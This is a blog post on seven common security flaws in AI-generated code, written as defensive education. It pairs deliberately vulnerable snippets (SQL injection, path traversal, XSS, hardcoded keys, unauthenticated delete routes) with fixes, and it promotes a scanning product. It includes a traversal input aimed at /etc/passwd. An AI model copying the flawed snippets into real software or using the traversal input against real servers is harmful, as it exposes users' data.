</blockquote> <h2> The Vibe Coding Revolution Has a Blind Spot </h2> <p>The way software gets built is shifting underneath us.</p> <p>A developer who would have spent two weeks on a full-stack app can now ship it in <br> an afternoon. Prompting has become a core skill. <em>Vibe coding</em> — describing what <br> you want and letting AI write the implementation — is producing real, functional <br> products at a pace nobody predicted.</p> <p>But there's a pattern emerging that deserves attention.</p> <p>In early 2025, researchers at Stanford found that developers using AI assistants <br> <strong>produced code with more security vulnerabilities</strong> than those writing manually — <br> and were <em>more confident</em> their code was secure. A separate study from the University <br> of Montreal found that roughly <strong>45% of LLM-generated code contains vulnerabilities</strong>.</p> <p>This isn't theoretical. AI-built projects are going to production every day — some <br> handling payments, some storing health data, some managing auth for thousands of users.</p> <p><strong>The AI that wrote the code doesn't audit the code. That gap is where things break.</strong></p> <h2> The 7 Most Common Vulnerability Patterns in AI-Generated Code </h2> <p>After analyzing scan results from AI-built projects across multiple languages and <br> frameworks, these are the patterns that show up repeatedly.</p> <h3> 1. 🔑 Hardcoded Secrets and API Keys </h3> <p>The single most common finding. AI assistants generate configuration examples with <br> placeholder values that developers replace with real credentials — and forget to <br> move to environment variables.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight javascript"><code><span class="c1">// ❌ AI-generated — don't ship this</span> <span class="kd">const</span> <span class="nx">db</span> <span class="o">=</span> <span class="k">new</span> <span class="nc">Client</span><span class="p">({</span> <span class="na">host</span><span class="p">:</span> <span class="dl">'</span><span class="s1">db.example.com</span><span class="dl">'</span><span class="p">,</span> <span class="na">user</span><span class="p">:</span> <span class="dl">'</span><span class="s1">admin</span><span class="dl">'</span><span class="p">,</span> <span class="na">password</span><span class="p">:</span> <span class="dl">'</span><span class="s1">sk_live_abc123actualkey</span><span class="dl">'</span><span class="p">,</span> <span class="c1">// CWE-798</span> <span class="na">database</span><span class="p">:</span> <span class="dl">'</span><span class="s1">production</span><span class="dl">'</span> <span class="p">});</span> </code></pre> </div> <p><strong>Why AI does this:</strong> LLMs learn from codebases that include config examples. The <br> model doesn't distinguish between a placeholder and a real secret — it generates <br> the pattern it's seen most often.</p> <p><strong>Fix it:</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight javascript"><code><span class="c1">// ✅ Always use environment variables</span> <span class="kd">const</span> <span class="nx">db</span> <span class="o">=</span> <span class="k">new</span> <span class="nc">Client</span><span class="p">({</span> <span class="na">host</span><span class="p">:</span> <span class="nx">process</span><span class="p">.</span><span class="nx">env</span><span class="p">.</span><span class="nx">DB_HOST</span><span class="p">,</span> <span class="na">user</span><span class="p">:</span> <span class="nx">process</span><span class="p">.</span><span class="nx">env</span><span class="p">.</span><span class="nx">DB_USER</span><span class="p">,</span> <span class="na">password</span><span class="p">:</span> <span class="nx">process</span><span class="p">.</span><span class="nx">env</span><span class="p">.</span><span class="nx">DB_PASSWORD</span><span class="p">,</span> <span class="na">database</span><span class="p">:</span> <span class="nx">process</span><span class="p">.</span><span class="nx">env</span><span class="p">.</span><span class="nx">DB_NAME</span> <span class="p">});</span> </code></pre> </div> <p>Run a secrets scanner before every commit using a pre-commit hook:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight yaml"><code><span class="c1"># .pre-commit-config.yaml</span> <span class="na">repos</span><span class="pi">:</span> <span class="pi">-</span> <span class="na">repo</span><span class="pi">:</span> <span class="s">https://github.com/gitleaks/gitleaks</span> <span class="na">rev</span><span class="pi">:</span> <span class="s">v8.18.0</span> <span class="na">hooks</span><span class="pi">:</span> <span class="pi">-</span> <span class="na">id</span><span class="pi">:</span> <span class="s">gitleaks</span> </code></pre> </div> <blockquote> <p>Tools like <a href="https://safeweave.dev" rel="noopener noreferrer">SafeWeave</a> detect hardcoded secrets as part <br> of a full SAST scan — directly inside your AI coding session via MCP.</p> </blockquote> <h3> 2. 💉 SQL Injection via String Concatenation </h3> <p>AI frequently generates SQL using template literals instead of parameterized queries <br> — especially for simple CRUD operations.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="c1"># ❌ Injectable — never do this </span><span class="nd">@app.route</span><span class="p">(</span><span class="sh">'</span><span class="s">/search</span><span class="sh">'</span><span class="p">)</span> <span class="k">def</span> <span class="nf">search</span><span class="p">():</span> <span class="n">query</span> <span class="o">=</span> <span class="n">request</span><span class="p">.</span><span class="n">args</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">'</span><span class="s">q</span><span class="sh">'</span><span class="p">)</span> <span class="n">results</span> <span class="o">=</span> <span class="n">db</span><span class="p">.</span><span class="nf">execute</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">SELECT * FROM products WHERE name LIKE </span><span class="sh">'</span><span class="s">%</span><span class="si">{</span><span class="n">query</span><span class="si">}</span><span class="s">%</span><span class="sh">'"</span><span class="p">)</span> <span class="k">return</span> <span class="nf">jsonify</span><span class="p">(</span><span class="n">results</span><span class="p">)</span> </code></pre> </div> <p><strong>Why AI does this:</strong> String interpolation is more concise. LLMs optimize for <br> readable, compact code. Parameterized queries require more boilerplate the model <br> skips unless you explicitly ask for security.</p> <p><strong>Fix it:</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="c1"># ✅ Parameterized query </span><span class="nd">@app.route</span><span class="p">(</span><span class="sh">'</span><span class="s">/search</span><span class="sh">'</span><span class="p">)</span> <span class="k">def</span> <span class="nf">search</span><span class="p">():</span> <span class="n">query</span> <span class="o">=</span> <span class="n">request</span><span class="p">.</span><span class="n">args</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">'</span><span class="s">q</span><span class="sh">'</span><span class="p">)</span> <span class="n">results</span> <span class="o">=</span> <span class="n">db</span><span class="p">.</span><span class="nf">execute</span><span class="p">(</span> <span class="sh">"</span><span class="s">SELECT * FROM products WHERE name LIKE %s</span><span class="sh">"</span><span class="p">,</span> <span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">%</span><span class="si">{</span><span class="n">query</span><span class="si">}</span><span class="s">%</span><span class="sh">"</span><span class="p">,)</span> <span class="p">)</span> <span class="k">return</span> <span class="nf">jsonify</span><span class="p">(</span><span class="n">results</span><span class="p">)</span> </code></pre> </div> <blockquote> <p><strong>Rule of thumb:</strong> If you see a variable interpolated directly into a SQL string <br> across any language or ORM — it's injectable.</p> </blockquote> <h3> 3. 🔓 Missing Authentication on Sensitive Endpoints </h3> <p>When you prompt AI to "build a REST API for managing users," it generates the CRUD <br> routes. What it frequently skips: auth middleware, authorization checks, and RBAC.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight javascript"><code><span class="c1">// ❌ No auth — any request can delete any user</span> <span class="nx">router</span><span class="p">.</span><span class="k">delete</span><span class="p">(</span><span class="dl">'</span><span class="s1">/api/users/:id</span><span class="dl">'</span><span class="p">,</span> <span class="k">async </span><span class="p">(</span><span class="nx">req</span><span class="p">,</span> <span class="nx">res</span><span class="p">)</span> <span class="o">=&gt;</span> <span class="p">{</span> <span class="k">await</span> <span class="nx">db</span><span class="p">.</span><span class="nf">query</span><span class="p">(</span><span class="dl">'</span><span class="s1">DELETE FROM users WHERE id = $1</span><span class="dl">'</span><span class="p">,</span> <span class="p">[</span><span class="nx">req</span><span class="p">.</span><span class="nx">params</span><span class="p">.</span><span class="nx">id</span><span class="p">]);</span> <span class="nx">res</span><span class="p">.</span><span class="nf">json</span><span class="p">({</span> <span class="na">deleted</span><span class="p">:</span> <span class="kc">true</span> <span class="p">});</span> <span class="p">});</span> </code></pre> </div> <p><strong>Why AI does this:</strong> The prompt said "build a user management API." It didn't say <br> "with authentication." LLMs are literal — they build exactly what you ask for.</p> <p><strong>Fix it:</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight javascript"><code><span class="c1">// ✅ Explicit auth + role check on every destructive route</span> <span class="nx">router</span><span class="p">.</span><span class="k">delete</span><span class="p">(</span><span class="dl">'</span><span class="s1">/api/users/:id</span><span class="dl">'</span><span class="p">,</span> <span class="nx">requireAuth</span><span class="p">,</span> <span class="nf">requireRole</span><span class="p">(</span><span class="dl">'</span><span class="s1">admin</span><span class="dl">'</span><span class="p">),</span> <span class="k">async </span><span class="p">(</span><span class="nx">req</span><span class="p">,</span> <span class="nx">res</span><span class="p">)</span> <span class="o">=&gt;</span> <span class="p">{</span> <span class="k">await</span> <span class="nx">db</span><span class="p">.</span><span class="nf">query</span><span class="p">(</span><span class="dl">'</span><span class="s1">DELETE FROM users WHERE id = $1</span><span class="dl">'</span><span class="p">,</span> <span class="p">[</span><span class="nx">req</span><span class="p">.</span><span class="nx">params</span><span class="p">.</span><span class="nx">id</span><span class="p">]);</span> <span class="nx">res</span><span class="p">.</span><span class="nf">json</span><span class="p">({</span> <span class="na">deleted</span><span class="p">:</span> <span class="kc">true</span> <span class="p">});</span> <span class="p">});</span> </code></pre> </div> <blockquote> <p><strong>Audit rule:</strong> Every endpoint that reads, writes, or deletes data needs explicit <br> auth checks. No exceptions.</p> </blockquote> <h3> 4. 📁 Path Traversal in File Operations </h3> <p>AI-generated file handlers frequently trust user-supplied filenames without sanitization.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight javascript"><code><span class="c1">// ❌ Path traversal — ?file=../../../etc/passwd reads any file</span> <span class="nx">app</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="dl">'</span><span class="s1">/download</span><span class="dl">'</span><span class="p">,</span> <span class="p">(</span><span class="nx">req</span><span class="p">,</span> <span class="nx">res</span><span class="p">)</span> <span class="o">=&gt;</span> <span class="p">{</span> <span class="kd">const</span> <span class="nx">filename</span> <span class="o">=</span> <span class="nx">req</span><span class="p">.</span><span class="nx">query</span><span class="p">.</span><span class="nx">file</span><span class="p">;</span> <span class="nx">res</span><span class="p">.</span><span class="nf">sendFile</span><span class="p">(</span><span class="nx">path</span><span class="p">.</span><span class="nf">join</span><span class="p">(</span><span class="nx">__dirname</span><span class="p">,</span> <span class="dl">'</span><span class="s1">uploads</span><span class="dl">'</span><span class="p">,</span> <span class="nx">filename</span><span class="p">));</span> <span class="c1">// CWE-22</span> <span class="p">});</span> </code></pre> </div> <p><strong>Why AI does this:</strong> The model generates the "happy path." File operations work <br> correctly with normal input — it doesn't reason about adversarial inputs unless prompted.</p> <p><strong>Fix it:</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight javascript"><code><span class="c1">// ✅ Strip traversal + verify resolved path</span> <span class="nx">app</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="dl">'</span><span class="s1">/download</span><span class="dl">'</span><span class="p">,</span> <span class="p">(</span><span class="nx">req</span><span class="p">,</span> <span class="nx">res</span><span class="p">)</span> <span class="o">=&gt;</span> <span class="p">{</span> <span class="kd">const</span> <span class="nx">filename</span> <span class="o">=</span> <span class="nx">path</span><span class="p">.</span><span class="nf">basename</span><span class="p">(</span><span class="nx">req</span><span class="p">.</span><span class="nx">query</span><span class="p">.</span><span class="nx">file</span><span class="p">);</span> <span class="kd">const</span> <span class="nx">filePath</span> <span class="o">=</span> <span class="nx">path</span><span class="p">.</span><span class="nf">join</span><span class="p">(</span><span class="nx">__dirname</span><span class="p">,</span> <span class="dl">'</span><span class="s1">uploads</span><span class="dl">'</span><span class="p">,</span> <span class="nx">filename</span><span class="p">);</span> <span class="k">if </span><span class="p">(</span><span class="o">!</span><span class="nx">filePath</span><span class="p">.</span><span class="nf">startsWith</span><span class="p">(</span><span class="nx">path</span><span class="p">.</span><span class="nf">resolve</span><span class="p">(</span><span class="nx">__dirname</span><span class="p">,</span> <span class="dl">'</span><span class="s1">uploads</span><span class="dl">'</span><span class="p">)))</span> <span class="p">{</span> <span class="k">return</span> <span class="nx">res</span><span class="p">.</span><span class="nf">status</span><span class="p">(</span><span class="mi">403</span><span class="p">).</span><span class="nf">json</span><span class="p">({</span> <span class="na">error</span><span class="p">:</span> <span class="dl">'</span><span class="s1">Access denied</span><span class="dl">'</span> <span class="p">});</span> <span class="p">}</span> <span class="nx">res</span><span class="p">.</span><span class="nf">sendFile</span><span class="p">(</span><span class="nx">filePath</span><span class="p">);</span> <span class="p">});</span> </code></pre> </div> <h3> 5. 🕸️ Cross-Site Scripting (XSS) via Unsanitized Output </h3> <p>AI frequently renders user input directly into HTML without escaping — common in <br> server-side rendering and API responses feeding frontend templates.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="c1"># ❌ Reflected XSS — CWE-79 </span><span class="nd">@app.route</span><span class="p">(</span><span class="sh">'</span><span class="s">/profile/&lt;username&gt;</span><span class="sh">'</span><span class="p">)</span> <span class="k">def</span> <span class="nf">profile</span><span class="p">(</span><span class="n">username</span><span class="p">):</span> <span class="n">user</span> <span class="o">=</span> <span class="nf">get_user</span><span class="p">(</span><span class="n">username</span><span class="p">)</span> <span class="k">return</span> <span class="sa">f</span><span class="sh">"</span><span class="s">&lt;h1&gt;Welcome, </span><span class="si">{</span><span class="n">user</span><span class="p">.</span><span class="n">display_name</span><span class="si">}</span><span class="s">&lt;/h1&gt;</span><span class="sh">"</span> </code></pre> </div> <p>If <code>display_name</code> contains a <code>&lt;script&gt;</code> tag — it executes in the browser.</p> <p><strong>Fix it:</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="c1"># ✅ Escape user input before rendering </span><span class="kn">from</span> <span class="n">markupsafe</span> <span class="kn">import</span> <span class="n">escape</span> <span class="nd">@app.route</span><span class="p">(</span><span class="sh">'</span><span class="s">/profile/&lt;username&gt;</span><span class="sh">'</span><span class="p">)</span> <span class="k">def</span> <span class="nf">profile</span><span class="p">(</span><span class="n">username</span><span class="p">):</span> <span class="n">user</span> <span class="o">=</span> <span class="nf">get_user</span><span class="p">(</span><span class="n">username</span><span class="p">)</span> <span class="k">return</span> <span class="sa">f</span><span class="sh">"</span><span class="s">&lt;h1&gt;Welcome, </span><span class="si">{</span><span class="nf">escape</span><span class="p">(</span><span class="n">user</span><span class="p">.</span><span class="n">display_name</span><span class="p">)</span><span class="si">}</span><span class="s">&lt;/h1&gt;</span><span class="sh">"</span> </code></pre> </div> <p>Better yet — use templating engines (Jinja2, EJS, Handlebars) that auto-escape by <br> default.</p> <h3> 6. 📦 Vulnerable Dependencies </h3> <p>When AI suggests <code>npm install &lt;package&gt;</code>, it recommends the version it was trained <br> on — potentially months or years old, with known CVEs.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight json"><code><span class="p">{</span><span class="w"> </span><span class="nl">"dependencies"</span><span class="p">:</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="nl">"lodash"</span><span class="p">:</span><span class="w"> </span><span class="s2">"4.17.20"</span><span class="p">,</span><span class="w"> </span><span class="nl">"jsonwebtoken"</span><span class="p">:</span><span class="w"> </span><span class="s2">"8.5.1"</span><span class="p">,</span><span class="w"> </span><span class="nl">"axios"</span><span class="p">:</span><span class="w"> </span><span class="s2">"0.21.1"</span><span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="p">}</span><span class="w"> </span></code></pre> </div> <p>All three of these have known vulnerabilities:</p> <div class="table-wrapper-paragraph"><table> <thead> <tr> <th>Package</th> <th>Version</th> <th>Vulnerability</th> </tr> </thead> <tbody> <tr> <td><code>lodash</code></td> <td>4.17.20</td> <td>Prototype pollution (CVE-2021-23337)</td> </tr> <tr> <td><code>jsonwebtoken</code></td> <td>8.5.1</td> <td>Algorithm confusion attacks</td> </tr> <tr> <td><code>axios</code></td> <td>0.21.1</td> <td>SSRF vulnerability</td> </tr> </tbody> </table></div> <p><strong>Why AI does this:</strong> The model has a training cutoff. It recommends whatever version <br> was most prevalent in the training corpus — it can't check a CVE database at generation <br> time.</p> <p><strong>Fix it:</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="c"># Run after every AI-suggested package install</span> npm audit pip audit cargo audit </code></pre> </div> <h3> 7. 🐳 Insecure Infrastructure Defaults </h3> <p>AI-generated Dockerfiles, Terraform configs, and Kubernetes manifests produce <br> minimal configurations that <em>work</em> — but lack security hardening.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight docker"><code><span class="c"># ❌ Insecure defaults</span> <span class="k">FROM</span><span class="s"> node:18</span> <span class="k">WORKDIR</span><span class="s"> /app</span> <span class="k">COPY</span><span class="s"> . .</span> <span class="k">RUN </span>npm <span class="nb">install</span> <span class="k">EXPOSE</span><span class="s"> 3000</span> <span class="k">CMD</span><span class="s"> ["node", "server.js"]</span> </code></pre> </div> <p><strong>Problems with this:</strong></p> <ul> <li>Runs as <code>root</code> (no <code>USER</code> directive)</li> <li>Copies everything including <code>.env</code>, <code>.git</code>, <code>node_modules</code> </li> <li>Uses full <code>node:18</code> image (larger attack surface)</li> <li>No health check defined</li> </ul> <p><strong>Fix it:</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight docker"><code><span class="c"># ✅ Hardened multi-stage build</span> <span class="k">FROM</span><span class="w"> </span><span class="s">node:18-alpine</span><span class="w"> </span><span class="k">AS</span><span class="w"> </span><span class="s">builder</span> <span class="k">WORKDIR</span><span class="s"> /app</span> <span class="k">COPY</span><span class="s"> package*.json ./</span> <span class="k">RUN </span>npm ci <span class="nt">--only</span><span class="o">=</span>production <span class="k">FROM</span><span class="s"> node:18-alpine</span> <span class="k">RUN </span>addgroup <span class="nt">-S</span> app <span class="o">&amp;&amp;</span> adduser <span class="nt">-S</span> app <span class="nt">-G</span> app <span class="k">WORKDIR</span><span class="s"> /app</span> <span class="k">COPY</span><span class="s"> --from=builder /app/node_modules ./node_modules</span> <span class="k">COPY</span><span class="s"> . .</span> <span class="k">USER</span><span class="s"> app</span> <span class="k">EXPOSE</span><span class="s"> 3000</span> <span class="k">HEALTHCHECK</span><span class="s"> CMD wget -q --spider http://localhost:3000/health || exit 1</span> <span class="k">CMD</span><span class="s"> ["node", "server.js"]</span> </code></pre> </div> <blockquote> <p>The same applies to Terraform (S3 buckets with public access on by default), <br> Kubernetes (containers running as privileged), and CloudFormation templates. <br> <a href="https://safeweave.dev" rel="noopener noreferrer">SafeWeave</a> scans IaC configs alongside your application <br> code — catching misconfigurations before they reach your cloud environment.</p> </blockquote> <h2> Why Traditional Security Tools Miss This Workflow </h2> <p>The standard AppSec toolchain was built for a different era:</p> <div class="table-wrapper-paragraph"><table> <thead> <tr> <th>Problem</th> <th>Impact</th> </tr> </thead> <tbody> <tr> <td><strong>CI/CD-only scanners</strong></td> <td>By the time you see the report, you've moved on. The cognitive distance between writing code and fixing it is huge.</td> </tr> <tr> <td><strong>Dashboard-heavy tools</strong></td> <td>Log in → navigate → find the finding → understand context → switch back to editor → find the line → fix it. Kills solo-dev momentum.</td> </tr> <tr> <td><strong>Enterprise pricing</strong></td> <td>$25–35/dev/month for a solo developer building a SaaS is the wrong model.</td> </tr> <tr> <td><strong>Manual review</strong></td> <td>Doesn't scale when AI generates 500 lines from a single prompt.</td> </tr> </tbody> </table></div> <p><strong>The gap is real-time, in-editor security scanning that fits the AI-assisted coding <br> workflow.</strong> Tools that plug into the same MCP interface AI assistants use — so <br> scanning happens <em>inside</em> the conversation, not in a separate window.</p> <p><a href="https://safeweave.dev" rel="noopener noreferrer">SafeWeave</a> is built specifically for this workflow: MCP-native <br> security scanning that runs SAST, secrets detection, dependency analysis, and IaC <br> checks directly inside Cursor, Claude Code, or Windsurf — without ever leaving <br> your editor.</p> <h2> A Practical Security Checklist for AI-Built Projects </h2> <p>Run this before every production deploy.</p> <h3> ✅ Authentication &amp; Authorization </h3> <ul> <li>[ ] Every API endpoint has explicit auth middleware</li> <li>[ ] Admin routes require role-based access control</li> <li>[ ] JWT secrets are stored in environment variables, not code</li> <li>[ ] Session tokens have expiration dates</li> <li>[ ] Password reset tokens are single-use and time-limited</li> </ul> <h3> ✅ Input Validation </h3> <ul> <li>[ ] All SQL queries use parameterized statements</li> <li>[ ] File paths are sanitized against directory traversal</li> <li>[ ] User input is escaped before rendering in HTML</li> <li>[ ] Request body size limits are configured</li> <li>[ ] File upload types and sizes are restricted</li> </ul> <h3> ✅ Secrets Management </h3> <ul> <li>[ ] No API keys, passwords, or tokens in source code</li> <li>[ ] <code>.env</code> files are in <code>.gitignore</code> </li> <li>[ ] No secrets in <code>Dockerfile ENV</code> or <code>ARG</code> instructions</li> <li>[ ] No secrets in client-side JavaScript bundles</li> <li>[ ] Git history doesn't contain previously committed secrets</li> </ul> <h3> ✅ Dependencies </h3> <ul> <li>[ ] <code>npm audit</code> / <code>pip audit</code> / <code>cargo audit</code> runs clean</li> <li>[ ] No dependencies with known critical CVEs</li> <li>[ ] Lock files are committed and up to date</li> <li>[ ] No unnecessary AI-suggested packages</li> </ul> <h3> ✅ Infrastructure </h3> <ul> <li>[ ] Containers don't run as root</li> <li>[ ] <code>.dockerignore</code> excludes <code>.env</code>, <code>.git</code>, <code>node_modules</code> </li> <li>[ ] HTTPS enforced — no HTTP fallback in production</li> <li>[ ] CORS configured to allow only specific origins</li> <li>[ ] Rate limiting on authentication endpoints</li> <li>[ ] Security headers set: CSP, HSTS, X-Frame-Options</li> </ul> <h3> ✅ Data Protection </h3> <ul> <li>[ ] Sensitive data encrypted at rest</li> <li>[ ] Database connections use TLS</li> <li>[ ] Logging doesn't include passwords, tokens, or PII</li> <li>[ ] Error messages don't expose stack traces to users</li> </ul> <h2> Automating Security in the AI Coding Workflow </h2> <p>The most effective approach integrates scanning at three layers:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>Layer 1: In-Editor (Real-Time) ↓ catches ~80% of issues immediately Layer 2: Pre-Commit Hooks ↓ catches secrets before they enter git history Layer 3: CI Pipeline ↓ catches anything that slipped through </code></pre> </div> <h3> Layer 1 — In-Editor, Real-Time </h3> <p>MCP-compatible security scanners run inside AI code editors. When you prompt your <br> assistant to scan a project, it runs SAST, secrets detection, and dependency analysis <br> right in the conversation — findings appear immediately, and you fix them in the same <br> session.</p> <p><a href="https://safeweave.dev" rel="noopener noreferrer">SafeWeave</a> was designed for exactly this layer — an MCP <br> server that connects to Cursor, Claude Code, and Windsurf so security becomes part <br> of the coding conversation, not an afterthought.</p> <h3> Layer 2 — Pre-Commit Hooks </h3> <div class="highlight js-code-highlight"> <pre class="highlight yaml"><code><span class="c1"># .pre-commit-config.yaml</span> <span class="na">repos</span><span class="pi">:</span> <span class="pi">-</span> <span class="na">repo</span><span class="pi">:</span> <span class="s">https://github.com/gitleaks/gitleaks</span> <span class="na">rev</span><span class="pi">:</span> <span class="s">v8.18.0</span> <span class="na">hooks</span><span class="pi">:</span> <span class="pi">-</span> <span class="na">id</span><span class="pi">:</span> <span class="s">gitleaks</span> </code></pre> </div> <blockquote> <p>Once a secret is committed, it lives in git history forever — even if you delete <br> it in a later commit.</p> </blockquote> <h3> Layer 3 — CI Pipeline </h3> <div class="highlight js-code-highlight"> <pre class="highlight yaml"><code><span class="c1"># GitHub Actions</span> <span class="pi">-</span> <span class="na">name</span><span class="pi">:</span> <span class="s">Security Scan</span> <span class="na">run</span><span class="pi">:</span> <span class="pi">|</span> <span class="s">npm audit --audit-level=high</span> <span class="s">npx semgrep --config auto .</span> </code></pre> </div> <p>The three layers create defense in depth. Most vulnerabilities get caught at Layer 1 <br> before they're even committed.</p> <h2> Compliance Considerations </h2> <p>AI-generated code doesn't get a compliance pass:</p> <div class="table-wrapper-paragraph"><table> <thead> <tr> <th>Standard</th> <th>Requirement</th> </tr> </thead> <tbody> <tr> <td><strong>SOC 2</strong></td> <td>Evidence of vulnerability testing — scan reports serve as audit artifacts</td> </tr> <tr> <td><strong>PCI-DSS v4.0</strong></td> <td>Static and dynamic SAST required for any system handling payment data</td> </tr> <tr> <td><strong>HIPAA</strong></td> <td>Security risk analysis required for systems handling PHI — that includes code-level vulns</td> </tr> <tr> <td><strong>GDPR</strong></td> <td>"Appropriate technical measures" for data protection — SQL injection in a user endpoint is the opposite</td> </tr> </tbody> </table></div> <p>Security scanners that map findings directly to compliance controls (OWASP Top 10, <br> SOC 2, PCI-DSS, HIPAA, NIST 800-53) make audits significantly easier — you produce <br> a report showing findings mapped to specific controls, not a generic vulnerability list.</p> <h2> The Economics: Security Is Cheaper Than a Breach </h2> <div class="table-wrapper-paragraph"><table> <thead> <tr> <th>Scenario</th> <th>Cost</th> </tr> </thead> <tbody> <tr> <td>Average small business data breach</td> <td>$120,000–$150,000</td> </tr> <tr> <td>Fixing a bug in development vs. production</td> <td> <strong>6x cheaper</strong> in dev (IBM research)</td> </tr> <tr> <td>Finding a SQL injection in your editor</td> <td>~5 minutes</td> </tr> <tr> <td>Finding it after exploitation</td> <td>The weekend — plus your users' data</td> </tr> <tr> <td>Running a full security scan</td> <td>10–15 seconds</td> </tr> </tbody> </table></div> <p>Open source scanners (Semgrep, Gitleaks, npm audit, Trivy, Checkov) are free. <br> MCP-integrated tools like <a href="https://safeweave.dev" rel="noopener noreferrer">SafeWeave</a> offer free tiers for <br> individual developers. Enterprise-grade security no longer requires enterprise budgets.</p> <h2> Conclusion </h2> <p>AI-assisted coding is the future. The productivity gains are real. But <strong>productivity <br> without security produces technical debt that compounds with interest</strong>.</p> <p>The good news: securing AI-generated code doesn't require a dedicated security team <br> or a six-figure tooling budget. It requires:</p> <ol> <li> <strong>Awareness</strong> of the vulnerability patterns AI consistently produces</li> <li> <strong>Automated scanning</strong> integrated into your existing workflow</li> <li> <strong>A checklist mentality</strong> — verify before you deploy</li> </ol> <p>The tools exist. The patterns are well-documented.</p> <p>The only question is whether you scan before your users do.</p> webdev ai security devsec